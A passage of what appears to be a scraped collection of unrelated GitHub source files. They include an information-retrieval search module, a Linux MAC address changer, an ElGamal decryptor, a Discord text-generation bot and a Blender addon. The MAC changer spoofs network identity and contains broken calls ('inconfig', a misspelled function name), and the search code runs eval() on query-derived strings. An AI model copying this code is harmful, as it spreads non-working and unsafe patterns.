f.write(json.dumps(dictionary))\r\n\r\n\r\ndef charger_json(name):\r\n import json\r\n return json.loads(open(os.path.join(position+\"\\\\objets\", name)+'.txt', 'r').read())\r\n\r\n\r\ndef Recherche_modelBooleen(Requete):\r\n global tableFrequences\r\n global tableFichierInverse\r\n if not bool(tableFrequences):\r\n tableFrequences = charger_obj(\"tableFrequences\")\r\n if not bool(tableFichierInverse):\r\n tableFichierInverse = charger_obj(\"fichierInverse\")\r\n\r\n docsPertinants = []\r\n ReqTokens = re.split(r'([ \\(\\)])', Requete.lower())\r\n ReqTokens = [el for el in ReqTokens if not re.match(\r\n r'\\s+', el) and el != '']\r\n \r\n ReqTerms = []\r\n for token in ReqTokens:\r\n if token not in ['(', ')', 'not', 'or', 'and']:\r\n ReqTerms.append(token)\r\n\r\n matriceAppariment = numpy.empty(\r\n shape=(len(tableFrequences)+1, len(ReqTerms)), dtype=str)\r\n for key in tableFichierInverse.keys():\r\n if recherche(key, ReqTerms) >= 0:\r\n liste = tableFichierInverse[key]\r\n for el in liste:\r\n matriceAppariment[el[0]][recherche(key, ReqTerms)] = \"1\"\r\n\r\n for i in range(1, len(tableFrequences)):\r\n docEtTerm = ReqTokens.copy()\r\n for j in range(len(ReqTokens)):\r\n if ReqTokens[j] in ['(', ')', 'not', 'or', 'and']:\r\n docEtTerm[j] = ReqTokens[j]\r\n else:\r\n docEtTerm[j] = \"1\" if matriceAppariment[i,ReqTerms.index(ReqTokens[j])] == \"1\"else \"0\" \r\n try:\r\n if(eval(' '.join(docEtTerm)) == 1):\r\n docsPertinants.append(i)\r\n\r\n except Exception:\r\n return -1\r\n\r\n\r\n return docsPertinants\r\n\r\n\r\ndef Recherche_ModelVectoriel(tableInversePoids, requete, methode,seuil):\r\n global tableFrequences\r\n global tableInversePondere\r\n global tableFrequencesPondere\r\n global matriceAppariment\r\n if os.path.exists('RSV_'+methode+'.txt'):\r\n resultat=charger_json(\"RSV_\"+methode)\r\n if resultat[\"Requete\"]==requete:\r\n return resultat[\"Resultat\"]\r\n\r\n debut=time.time()\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n tableFrequences=construireTableFreq(baseFilePath+\"cacm.all\")\r\n if not bool(tableFrequences):\r\n tableFrequences = charger_obj(\"tableFrequences\")\r\n\r\n if not os.path.exists('objets\\\\fichierInversePondere.txt'):\r\n \r\n tableInversePondere=construireFichierInversePondere()\r\n\r\n if not bool(tableInversePondere):\r\n tableInversePondere = charger_obj(\"fichierInversePondere\")\r\n\r\n if not os.path.exists('objets\\\\tableFrequencesPondere.txt'):\r\n tableFrequencesPondere=construireTableFrequencesPondere()\r\n\r\n if not bool(tableFrequencesPondere):\r\n tableFrequencesPondere = charger_obj(\"tableFrequencesPondere\") \r\n\r\n \r\n \r\n ensembleTermes = [term for term in list(tableInversePondere)]\r\n \r\n # if matriceAppariment is None:\r\n # if not os.path.exists('objets\\\\matriceCollection.pkl'):\r\n # matriceAppariment = numpy.empty(shape=(len(tableFrequences)+1, len(tableInversePondere)), dtype=int)\r\n\r\n # for doc in tableFrequences.keys():\r\n \r\n # for i in range(len(ensembleTermes)):\r\n # if(ensembleTermes[i] in tableFrequences[doc]):\r\n # matriceAppariment[int(doc),i] = tableFrequences[doc][ensembleTermes[i]]\r\n # else:\r\n # matriceAppariment[int(doc), i] = 0\r\n\r\n\r\n # sauvegarder_obj(matriceAppariment,\"matriceCollection\") \r\n\r\n # else:\r\n # matriceAppariment=charger_obj(\"matriceCollection\") \r\n \r\n\r\n Requete = [term for term in nltk.tokenize.word_tokenize(requete) if not acess(term) and not term in '[ ( ) ! \\ ? . ; , - - : / \\' \\ * \\ + \\ - ]'.split(' ') ]\r\n vecteurRequete = numpy.empty(len(tableInversePondere.keys()), dtype=int)\r\n \r\n for i in range(len(vecteurRequete)):\r\n vecteurRequete[i] = 1 if recherche(\r\n ensembleTermes[i], Requete) >= 0 else 0\r\n tableRSV={}\r\n for doc in range(1, len(tableFrequences)):\r\n sommex=0.0\r\n sommexy=0.0\r\n sommey=0.0\r\n # Effectuer les calculs\r\n if(methode.lower() == \"Inner Product\".lower()):\r\n for indice in range(len(Requete)):\r\n sommexy = sommexy+float((tableFrequencesPondere[doc][Requete[indice]] if Requete[indice] in tableFrequencesPondere[doc] else 0))\r\n if sommexy>seuil:\r\n tableRSV[doc]=sommexy\r\n\r\n if(methode.lower() == \"Coef. de Dice\".lower()):\r\n vecteurAppariement=[]\r\n \r\n for mot,poids in tableFrequencesPondere[doc].items():\r\n vecteurAppariement.append(mot)\r\n sommey+=pow(poids,2)\r\n \r\n \r\n for indice in range(len(Requete)):\r\n sommex +=1 #sommex+ pow( vecteurRequete[indice],2)\r\n \r\n if( recherche( Requete[indice] , vecteurAppariement)>=0):\r\n y=tableFrequencesPondere[doc][Requete[indice].lower()]\r\n else :\r\n y=0.0\r\n \r\n sommexy = sommexy+y\r\n sommey = sommey+pow(y,2)\r\n if(sommex+sommey) != 0:\r\n rsv = (2*sommexy)/(sommex+sommey)\r\n else :\r\n rsv=0 \r\n if rsv>seuil:\r\n tableRSV[doc]=rsv\r\n\r\n if(methode.lower() == \"Mesure de Cosinus\".lower()):\r\n # somme des x^2, y^2, x*y\r\n vecteurAppariement=[]\r\n \r\n for mot,poids in tableFrequencesPondere[doc].items():\r\n vecteurAppariement.append(mot)\r\n sommey+=pow(poids,2)\r\n \r\n \r\n for indice in range(len(Requete)):\r\n sommex +=1 #sommex+ pow( vecteurRequete[indice],2)\r\n \r\n if( recherche( Requete[indice] , vecteurAppariement)>=0):\r\n y=tableFrequencesPondere[doc][Requete[indice].lower()]\r\n else :\r\n y=0.0\r\n \r\n sommexy = sommexy+y\r\n sommey = sommey+pow(y,2)\r\n\r\n if(sqrt(sommex*sommey) != 0):\r\n rsv = sommexy/sqrt(sommex*sommey)\r\n else :\r\n rsv=0\r\n if rsv>seuil:\r\n tableRSV[doc]=rsv\r\n\r\n if(methode.lower() == \"Mesure de Jacard\".lower()):\r\n # somme des x^2; y^2 et x*y\r\n vecteurAppariement=[]\r\n \r\n for mot,poids in tableFrequencesPondere[doc].items():\r\n vecteurAppariement.append(mot)\r\n sommey+=pow(poids,2)\r\n \r\n \r\n for indice in range(len(Requete)):\r\n sommex +=1 #sommex+ pow( vecteurRequete[indice],2)\r\n \r\n if( recherche( Requete[indice] , vecteurAppariement)>=0):\r\n y=tableFrequencesPondere[doc][Requete[indice].lower()]\r\n else :\r\n y=0.0\r\n \r\n sommexy = sommexy+y\r\n sommey = sommey+pow(y,2)\r\n # mesure pour le doc i\r\n if((sommex+sommey-sommexy) != 0):\r\n rsv = sommexy/(sommex+sommey-sommexy)\r\n else :\r\n rsv=0 \r\n if rsv>seuil:\r\n tableRSV[doc]=rsv\r\n\r\n tableRSV=dict(sorted(tableRSV.items(),key=operator.itemgetter(1),reverse=True))\r\n fin=time.time()\r\n print(\"Temps d'execution :\"+str(fin-debut)+\" seconds.\")\r\n tempsExecution[\"temps_modeleVectoriel\"]=fin-debut\r\n result={}\r\n result[\"Requete\"]=requete\r\n result['Resultat']=tableRSV\r\n sauvegarder_json(result,\"RSV_\"+methode)\r\n return tableRSV \r\n\r\ndef chargerRequetes(nomF):\r\n global stopWordsIndex\r\n\r\n stopWordsIndex=construireIndexMotsVides()\r\n\r\n tabContenu=ExtraireInformations(nomF)\r\n\r\n dictionnaireRequetes=nltk.defaultdict(list)\r\n\r\n for doc,contenu in tabContenu.items():\r\n listeTokens = set()\r\n tab = nltk.tokenize.word_tokenize(contenu)\r\n for mot in tab:\r\n if not mot in '[ ( ) ! \\ ? . ; , - - : / \\' \\ * \\ + \\ - ]'.split(' ') and not acess(mot):\r\n listeTokens.add(mot)\r\n\r\n dictionnaireRequetes[int(doc)] = list(listeTokens)\r\n\r\n return dictionnaireRequetes \r\n\r\n\r\ndef chargerResultatsRequetes(nomF):\r\n f=open(nomF,'r')\r\n text=f.readlines()\r\n Resultat=nltk.defaultdict(list)\r\n for line in text:\r\n Tab=line.split() \r\n Resultat[int(Tab[0])].append(int(Tab[1]))\r\n return Resultat\r\n\r\n\r\ndef evaluerModelVectoriel(resultats,numRequete,methode):\r\n \r\n \r\n resultatAttendus=chargerResultatsRequetes(baseFilePath+\"qrels.text\")[numRequete]\r\n #print(\"Expected : \"+str(resultatAttendus))\r\n\r\n #print(\"returned : \"+str(resultats))\r\n intersect=list(set(resultats) & set(resultatAttendus))\r\n rappel=len(intersect)/len(resultatAttendus) if len(resultatAttendus)!=0 else 0\r\n\r\n precision=len(intersect)/len(resultats) if len(resultats)!=0 else 0\r\n return [rappel,precision]\r\n\r\n\r\ndef recherche(term, liste):\r\n for i in range(len(liste)):\r\n if liste[i].lower() == term.lower():\r\n return i\r\n\r\n return -1\r\n\r\ndef getTableFrequences():\r\n global tableFrequences\r\n global baseFilePath\r\n if not os.path.exists('objets\\\\tableFrequences.txt'):\r\n tableFrequences=construireTableFreq(baseFilePath+\"cacm.all\")\r\n \r\n if not bool(tableFrequences):\r\n tableFrequences=charger_obj(\"tableFrequences\")#charger_json(\"tableFrequences\")\r\n\r\n return tableFrequences \r\n\r\ndef getTableFichierInverse():\r\n global tableFichierInverse\r\n\r\n if not os.path.exists('objets\\\\fichierInverse.txt'):\r\n tableFichierInverse=construireFichierInverse()\r\n\r\n if not bool(tableFichierInverse):\r\n tableFichierInverse = charger_obj(\"fichierInverse\")\r\n\r\n return tableFichierInverse \r\n \r\n \r\n\r\n\r\n# ***************************************************************************************************************\r\n\r\n\r\n\r\ndef evaluation(vectResult, docsUser):\r\n docsSys = []\r\n docsPerti = []\r\n for element in vectResult:\r\n if (element != 0.0):\r\n docsSys.append(element[0])\r\n for element in docsSys:\r\n if element in docsUser:\r\n docsPerti.append(element)\r\n # calcul du rappel et de la precision\r\n nbDocsSys = len(docsSys)\r\n nbDocsUser = len(docsUser)\r\n nbDocsPerti = len(docsPerti)\r\n print(nbDocsSys, nbDocsUser, nbDocsPerti)\r\n # nb docs pertinants de sys / nb docs pertinants de user\r\n rappel = nbDocsPerti/nbDocsUser\r\n # nb docs pertinants de sys / nb total docs retournés par sys\r\n précision = nbDocsPerti/nbDocsSys\r\n\r\n result = []\r\n result.append(rappel)\r\n result.append(précision)\r\n\r\n return result\r\n\r\n\r\n","repo_name":"goldenfay/information-retreival-app","sub_path":"searchModel.py","file_name":"searchModel.py","file_ext":"py","file_size_in_byte":21874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31778790350","text":"import subprocess\nimport string\nimport random\nimport re\n\n\nclass bcolors:\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n RED = '\\033[31m'\n YELLOW = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n BGRED = '\\033[41m'\n WHITE = '\\033[37m'\n\n\nprint(\"\"\"\n\n __ __ _ ____ \n | \\/ | / \\ / ___| \n | |\\/| | / _ \\| | \n | | | |/ ___ \\ |___ \n |_| |_/_/ \\_\\____| \n ____ _ \n / ___| |__ __ _ _ __ __ _ ___ _ __ \n | | | '_ \\ / _` | '_ \\ / _` |/ _ \\ '__|\n | |___| | | | (_| | | | | (_| | __/ | \n \\____|_| |_|\\__,_|_| |_|\\__, |\\___|_| \n |___/ \n\n\nMAC Changer v1.0\nCoded by Namiq Mamedov\nmamedov_namiq02@mail.ru\n\n\"\"\")\n\n\ndef get_random_mac_address():\n uppercased_hexdigits = ''.join(set(string.hexdigits.upper()))\n\n mac = \"\"\n for i in range(6):\n for j in range(2):\n if i == 0:\n mac += random.choice(\"02468ACE\")\n else:\n mac += random.choice(uppercased_hexdigits)\n mac += \":\"\n return mac.strip(\":\")\n\n\ndef get_current_mac_adrress(iface):\n output = subprocess.check_output(f\"ifconfig {iface}\", shell=True).decode()\n\n return re.search(\"ether (.+)\", output).group().split()[1].strip()\n\n\ndef change_mac_address(iface, new_mac_address):\n subprocess.check_output(f\"inconfig {iface} down\", shell=True)\n\n subprocess.check_output(f\"inconfig {iface} hw ether {new_mac_address}\", shell=True)\n\n subprocess.check_output(f\"ifconfig {iface} up\", shell=True)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Python Mac Changer on Linux\")\n parser.add_argument(\"interface\", help=\"The network interface name on Linux\")\n parser.add_argument(\"-r\", \"--random\", action=\"store_true\", help=\"Whether to generate a random MAC address\")\n parser.add_argument(\"-m\", \"--mac\", help=\"The new MAC you want to change to\")\n args = parser.parse_args()\n iface = args.interface\n if args.random:\n new_mac_address = get_random_mac_address()\n elif args.mac:\n new_mac_address = args.mac\n\n old_mac_address = get_current_mac_address(iface)\n print(\"[*] Old MAC address:\", old_mac_address)\n\n change_mac_address(iface, new_mac_address)\n\n new_mac_address = get_current_mac_address(iface)\n print(\"[+] New MAC address:\", new_mac_address)\n\n\n\n","repo_name":"namiqmamedovv/mac_changer","sub_path":"macchanger.py","file_name":"macchanger.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27928544833","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'aquastore_app'\n\nurlpatterns = [\n path(r'', views.lista_aguas, name='lista_aguas'),\n path(r'cat//', views.lista_aguas, name='lista_aguas_por_categoria'),\n path(r'produto/()', views.exibe_agua, name='exibe_agua'),\n path(r'sobre.html', views.sobre, name='sobre'),\n path(r'cadastro.html', views.novo, name='cadastro'),\n path(r'admin.html', views.admin, name='admin'),\n path(r'/update', views.atualiza, name='atualiza'),\n path(r'/delete', views.deleta, name='deleta'),\n path(r'register.html', views.register, name='register'),\n path(r'logout', views.logout_user, name='logout_user'),\n]\n\n","repo_name":"lclopes/Aqua-Store-Django","sub_path":"aquastore_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41878282456","text":"\"\"\"\nGiven an array of intervals where intervals[i] = [starti, endi], merge all overlapping intervals, and return an array of the non-overlapping intervals that cover all the intervals in the input.\n\n\n\nExample 1:\n\nInput: intervals = [[1,3],[2,6],[8,10],[15,18]]\nOutput: [[1,6],[8,10],[15,18]]\nExplanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].\n\nExample 2:\n\nInput: intervals = [[1,4],[4,5]]\nOutput: [[1,5]]\nExplanation: Intervals [1,4] and [4,5] are considered overlapping.\n\n\nConstraints:\n\n1 <= intervals.length <= 10^4\nintervals[i].length == 2\n0 <= starti <= endi <= 10^4\n\"\"\"\nfrom typing import List\n\n\nclass Solution1:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n result = []\n if not intervals:\n return result\n ordered = sorted(intervals, key=lambda a: a[0])\n pre = [ordered[0][0], ordered[0][1]]\n result.append(pre)\n for i in range(1, len(ordered)):\n if pre[1] >= ordered[i][0]:\n pre[1] = max(pre[1], ordered[i][1])\n else:\n pre = [ordered[i][0], ordered[i][1]]\n result.append(pre)\n return result\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/leetcodepy/merge_intervals.py","file_name":"merge_intervals.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"86200179","text":"import os\n\nimport pytest\nimport yatest.common\n\npytest_plugins = [\n \"crypta.utils.rtmr_resource_service.bin.server.testutils.fixtures\",\n]\n\n\n@pytest.fixture\ndef file_root(request):\n yield getattr(request.module, \"FILE_ROOT\", yatest.common.test_source_path(\"data/resource_service/resources\"))\n\n\n@pytest.fixture\ndef resources(file_root):\n yield {name: {\"resource_type\": name} for name in os.listdir(file_root)}\n\n\n@pytest.fixture\ndef cluster_envs():\n yield {\n \"rtmr-vla\": \"stable\",\n }\n\n\n@pytest.fixture\ndef public_resources(file_root, resources):\n yield {\n (resource, \"stable\", int(version))\n for resource in resources\n for version in os.listdir(os.path.join(file_root, resource))\n }\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test_framework/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15169170059","text":"P = float(input())\r\n\r\ndef f(p):\r\n return p + P*2**(-p/1.5)\r\n\r\nEPSILON = 10**(-9)\r\nlo = 0\r\nhi = P\r\nwhile hi-lo >= 10**(-8):\r\n m = (hi + lo) /2\r\n fm = f(m)\r\n fme = f(m+EPSILON)\r\n if fm > fme:\r\n lo = m\r\n else:\r\n hi = m\r\nprint(min(f(lo), f(hi)))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc054/B/2521456.py","file_name":"2521456.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"72230982314","text":"from .elhamal_encryptor import ElHamal\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtProperty, pyqtSlot\nfrom PyQt5.QtGui import QClipboard, QGuiApplication\n\n\nclass ElHamalDecryptor(QObject):\n keysChanged = pyqtSignal()\n encryptedMessageChanged = pyqtSignal()\n sourceMessageChanged = pyqtSignal()\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self._p = 0\n self._g = 0\n self._y = 0\n self._x = 0\n self._encryptedMessage = \"\"\n self._sourceMessage = \"\"\n self._clipboard = QGuiApplication.clipboard()\n\n @pyqtSlot()\n def pasteEncryptedMessageFromClipboard(self):\n self.encryptedMessage = self._clipboard.text(QClipboard.Clipboard)\n\n @pyqtSlot()\n def pasteKeysFromClipboard(self):\n keys = self._clipboard.text(QClipboard.Clipboard).split(' ')\n if len(keys) >= 4 and all(x.isalnum() for x in keys):\n keys = [int(x) for x in keys]\n self._p, self._g, self._y, self._x = keys[:4]\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @pyqtSlot()\n def copySourceMessageToClipboard(self):\n self._clipboard.setText(self._sourceMessage, QClipboard.Clipboard)\n\n @pyqtProperty(int, notify=keysChanged)\n def p(self) -> int:\n return self._p\n\n @pyqtProperty(int, notify=keysChanged)\n def g(self) -> int:\n return self._g\n\n @pyqtProperty(int, notify=keysChanged)\n def y(self) -> int:\n return self._y\n\n @pyqtProperty(int, notify=keysChanged)\n def x(self) -> int:\n return self._x\n\n @pyqtProperty(str, notify=sourceMessageChanged)\n def sourceMessage(self) -> str:\n self.decryptMessage()\n return self._sourceMessage\n\n @pyqtProperty(str, notify=encryptedMessageChanged)\n def encryptedMessage(self) -> str:\n return self._encryptedMessage\n\n @p.setter\n def p(self, p):\n self._p = p\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @g.setter\n def g(self, g):\n self._g = g\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @y.setter\n def y(self, y):\n self._y = y\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @x.setter\n def x(self, x):\n self._x = x\n self.keysChanged.emit()\n self.sourceMessageChanged.emit()\n\n @encryptedMessage.setter\n def encryptedMessage(self, encryptedMessage):\n self._encryptedMessage = encryptedMessage\n self.encryptedMessageChanged.emit()\n self.sourceMessageChanged.emit()\n\n def decryptMessage(self):\n keys = [self._p, self._g, self._y, self._x]\n result = ''\n if all(x >= 0 for x in keys) and len(self._encryptedMessage) > 0:\n try:\n cryptogram = ElHamal.cryptogram_from_string(\n self._encryptedMessage)\n result = ElHamal.decrypt(cryptogram, keys)\n except Exception as e:\n print(str(e))\n result = 'error'\n self._sourceMessage = result\n","repo_name":"lepesevichnikita/El-Hamal","sub_path":"src/elhamal_decryptor.py","file_name":"elhamal_decryptor.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28589499451","text":"\"\"\" Downloads zip file from the web and saves contents to a local directory.\nUsage: download_data.py --url= --out_dir=\nOptions:\n--url= URL to download data (as zip) from\n--out_dir= Path to write the unziped contents to \n\"\"\"\n\nfrom zipfile import ZipFile\nfrom io import BytesIO\nimport requests\nfrom docopt import docopt\n\nopt = docopt(__doc__)\n\ndef main(url, out_dir):\n \n #check if URL is valid\n try: \n request = requests.get(url, stream=True)\n request.status_code == 200\n except Exception as ex: \n print(\"the URL provided is invalid\")\n print(ex)\n \n # unzip and save contents\n with ZipFile(BytesIO(request.content)) as zip_file_object:\n zip_file_object.extractall(out_dir)\n\n\nif __name__ == \"__main__\":\n main(opt['--url'],opt['--out_dir'])","repo_name":"UBC-MDS/diabetes_prediction","sub_path":"src/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37772250229","text":"# Work with Python 3.6\nimport textgenrnn\nimport discord\nimport random\nimport string\nimport os\nimport zipfile\nimport tempfile\nimport shutil\nimport time\nimport datetime\nimport json\n\nJSON_NAME = 'discord_bot.json'\n\njson_file = dict()\nTOKEN = ''\ntry:\n with open(JSON_NAME, 'r') as f:\n json_file = json.load(f)\n TOKEN = json_file['token']\nexcept:\n TOKEN = input('Input Discord Token: ')\n json_file = dict()\n json_file['token'] = TOKEN\n with open(JSON_NAME, 'w') as f:\n json.dump(json_file, f)\n\nclient = discord.Client()\n\ndef random_name(length):\n return ''.join(random.choices(string.digits + string.ascii_uppercase + string.ascii_lowercase, k=length))\n\ndef gen_text(brain_name, length, temp=1.0):\n #extract brain\n brain = os.path.dirname(__file__)\n brain = os.path.join(brain, \"brains\")\n brain = os.path.join(brain, brain_name + \".zip\")\n \n tempdir_base = tempfile.gettempdir()\n tempdir_base = os.path.join(tempdir_base, 'textgenrnn-easygen')\n tempdir = os.path.join(tempdir_base, random_name(32))\n while os.path.exists(tempdir):\n tempdir = os.path.join(tempdir_base, random_name(32))\n if not os.path.exists(tempdir_base):\n os.mkdir(tempdir_base)\n os.mkdir(tempdir)\n with zipfile.ZipFile(brain, 'r') as zf:\n zf.extractall(tempdir)\n\n #generate text\n start_time = time.time()\n from textgenrnn import textgenrnn\n\n textgen = textgenrnn(weights_path = os.path.join(tempdir, 'weights.hdf5'),\n vocab_path = os.path.join(tempdir, 'vocab.json'),\n config_path = os.path.join(tempdir, 'config.json'))\n\n print('Creating {} characters...'.format(length))\n text = textgen.generate(max_gen_length = length,\n return_as_list = True,\n temperature = temp)[0]\n\n gen_secs = time.time() - start_time\n gen_time = str(datetime.timedelta(seconds=gen_secs)).split(':')\n time_text = str(round(float(gen_time[-1]))) + \" seconds\"\n if len(time_text) >= 2:\n mins = gen_time[-2]\n if mins[0] == '0':\n mins = mins[1:]\n if mins not in ('', '0'):\n time_text = mins + \" minutes, \" + time_text\n if len(time_text) >= 3:\n hours = gen_time[-3]\n if hours[0] == '0':\n hours = hours[1:]\n if hours not in ('', '0'):\n time_text = hours + \" hours, \" + time_text\n print('Done making text! It took {}.'.format(time_text))\n print(text)\n print('\\nCleaning up...')\n shutil.rmtree(tempdir)\n print('All done!')\n return text\n\n@client.event\nasync def on_message(message):\n # we do not want the bot to reply to itself\n if message.author == client.user:\n return\n\n content = message.content.split(\" \")\n if content[0] == \"!textgenrnn\":\n msg = None\n try:\n length = int(content[2])\n try:\n msg = gen_text(content[1], int(content[2]))\n except:\n msg = \"Invalid model name: \" + content[1]\n except:\n msg = \"Invalid length: \" + content[2]\n \n await client.send_message(message.author, msg)\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n\nclient.run(TOKEN)\n","repo_name":"nimaid/textgenrnn-easygen","sub_path":"textgenrnn_bot.py","file_name":"textgenrnn_bot.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11918571545","text":"import os\nimport pkgutil\nimport importlib\nimport math\n\nfrom time import time\nimport numpy as np\n\n\nbl_info = {\n \"name\": \"Bouncy Ball\",\n \"description\": \"Yup, just a ball that bounces around\",\n \"author\": \"Diego Gangl \",\n \"version\": (1, 0, 0),\n \"BLENDER\": (2, 70, 0),\n \"location\": \"3D View\",\n \"warning\": \"\",\n \"link\": \"\",\n \"tracker_url\": \"\",\n \"category\": \"3D View\"\n}\n\n\n# ------------------------------------------------------------------------------\n# Package Setup\n# ------------------------------------------------------------------------------\ndef setup_addon_modules(path, package_name, reload):\n \"\"\"\n Imports and reloads all modules in this addon.\n\n path -- __path__ from __init__.py\n package_name -- __name__ from __init__.py\n \"\"\"\n def get_submodule_names(path=path[0], root=\"\"):\n module_names = []\n for importer, module_name, is_package in pkgutil.iter_modules([path]):\n if is_package:\n sub_path = os.path.join(path, module_name)\n sub_root = root + module_name + \".\"\n module_names.extend(get_submodule_names(sub_path, sub_root))\n else:\n module_names.append(root + module_name)\n return module_names\n\n def import_submodules(names):\n modules = []\n for name in names:\n if name == 'batch_render.dispatcher':\n continue\n\n modules.append(importlib.import_module(\".\" + name, package_name))\n return modules\n\n def reload_modules(modules):\n for module in modules:\n importlib.reload(module)\n\n names = get_submodule_names()\n modules = import_submodules(names)\n if reload:\n reload_modules(modules)\n return modules\n\n\nmodules = setup_addon_modules(__path__, __name__, \"bpy\" in locals())\n\nimport bpy\nfrom bpy.props import (FloatProperty, FloatVectorProperty, PointerProperty)\nfrom . import ball\n\n\n# ------------------------------------------------------------------------------\n# Data\n# ------------------------------------------------------------------------------\n\nclass Bouncy_PROP_Main(bpy.types.PropertyGroup):\n\n gravity = FloatProperty(name='Gravity',\n description='Gravity',\n default=50,\n min=10,\n max=100,\n precision=1,\n subtype='PERCENTAGE')\n\n bounciness = FloatProperty(name='Bounciness',\n description='Restituion coefficient',\n default=90,\n min=0,\n max=100,\n precision=1,\n subtype='PERCENTAGE')\n\n radius = FloatProperty(name='Radius',\n description='Size of the ball',\n default=50,\n min=10,\n max=100,\n precision=1)\n\n color = FloatVectorProperty(name='Color',\n description='Ball Color',\n min=0,\n max=1,\n default=(1, 0.55, 0.06),\n subtype='COLOR')\n\n\n# ------------------------------------------------------------------------------\n# Operator\n# ------------------------------------------------------------------------------\n\nadd_handler = bpy.types.SpaceView3D.draw_handler_add\nremove_handler = bpy.types.SpaceView3D.draw_handler_remove\nadd_timer = bpy.context.window_manager.event_timer_add\nremove_timer = bpy.context.window_manager.event_timer_remove\n\n\nclass BouncyBall(bpy.types.Operator):\n \"\"\"Create a ball that bounces around the 3D View\"\"\"\n\n bl_idname = \"view3d.bouncy_ball\"\n bl_label = \"Bouncy Ball\"\n\n @classmethod\n def poll(cls, context):\n return context.area.type == 'VIEW_3D'\n\n def modal(self, context, event):\n\n context.area.tag_redraw()\n message = '{0} bounces so far | Press ESC to stop bouncing'\n context.area.header_text_set(message.format(self.args['state'].bounces))\n\n if event.type == 'TIMER' and not self.drag:\n self.args['state'] = self._move(self.args['state'])\n\n elif event.type == 'LEFTMOUSE' and event.value == 'PRESS':\n\n click = np.array((event.mouse_region_x, event.mouse_region_y))\n distance = np.linalg.norm(click - self.args['state'].position)\n\n if distance <= self.args['settings'].radius:\n context.window.cursor_set('HAND')\n self.args['ever_dragged'] = True\n\n origin = (event.mouse_region_x, event.mouse_region_y)\n\n self.drag, self.release = ball.drag_start(self.args['settings'],\n self.args['state'],\n origin)\n\n elif (event.type == 'LEFTMOUSE' and event.value == 'RELEASE' \n and self.drag):\n\n context.window.cursor_set('DEFAULT')\n self._dragging = False\n\n position = np.array((event.mouse_region_x, event.mouse_region_y))\n velocity = self.release(position)\n\n self.args['state'] = self._move(self.args['state'], velocity)\n self.drag = None\n self.release = None\n\n elif event.type == 'MOUSEMOVE' and self.drag:\n self.args['state'] = self.drag(event)\n\n elif event.type == 'ESC':\n remove_handler(self._handle, 'WINDOW')\n remove_timer(self._timer)\n context.area.header_text_set()\n\n return {'FINISHED'}\n\n return {'RUNNING_MODAL'}\n\n def invoke(self, context, event):\n\n center = np.array((context.area.width / 2, context.area.height / 2))\n ui_settings = context.window_manager.bouncy\n settings = ball.Settings(ui_settings.radius,\n np.array(ui_settings.color),\n ui_settings.gravity / 25,\n ui_settings.bounciness / 100)\n\n self.args = {\n 'settings': settings,\n 'ever_dragged': False,\n 'state': ball.State(position=center,\n velocity=np.zeros(2),\n bounces=0)\n }\n\n self.drag = None\n self.release = None\n\n self._move = ball.physics_setup(settings)\n self._timer = add_timer(1/60, context.window)\n self._handle = add_handler(ball.callback, (self.args,), \n 'WINDOW', 'POST_PIXEL')\n\n context.window_manager.modal_handler_add(self)\n return {'RUNNING_MODAL'}\n\n\n# ------------------------------------------------------------------------------\n# UI\n# ------------------------------------------------------------------------------\n\nclass Bouncy_Panel(bpy.types.Panel):\n bl_idname = \"bouncy.panel\"\n bl_label = \"Bouncy Ball\"\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"TOOLS\"\n bl_category = 'Tools'\n\n def draw(self, context):\n \"\"\" Draw terrain Panel \"\"\"\n\n layout = self.layout\n settings = context.window_manager.bouncy\n\n col = layout.column(align=True)\n col.prop(settings, 'bounciness')\n col.prop(settings, 'gravity')\n\n row = layout.row()\n row.prop(settings, 'color')\n\n row = layout.row()\n row.prop(settings, 'radius')\n\n layout.separator()\n layout.separator()\n\n row = layout.row()\n row.scale_y = 1.2\n row.operator('view3d.bouncy_ball', text='Bounce!', icon='MOD_PHYSICS')\n\n\n# ------------------------------------------------------------------------------\n# Register\n# ------------------------------------------------------------------------------\n\ndef register():\n bpy.utils.register_module(__name__)\n bpy.types.WindowManager.bouncy = 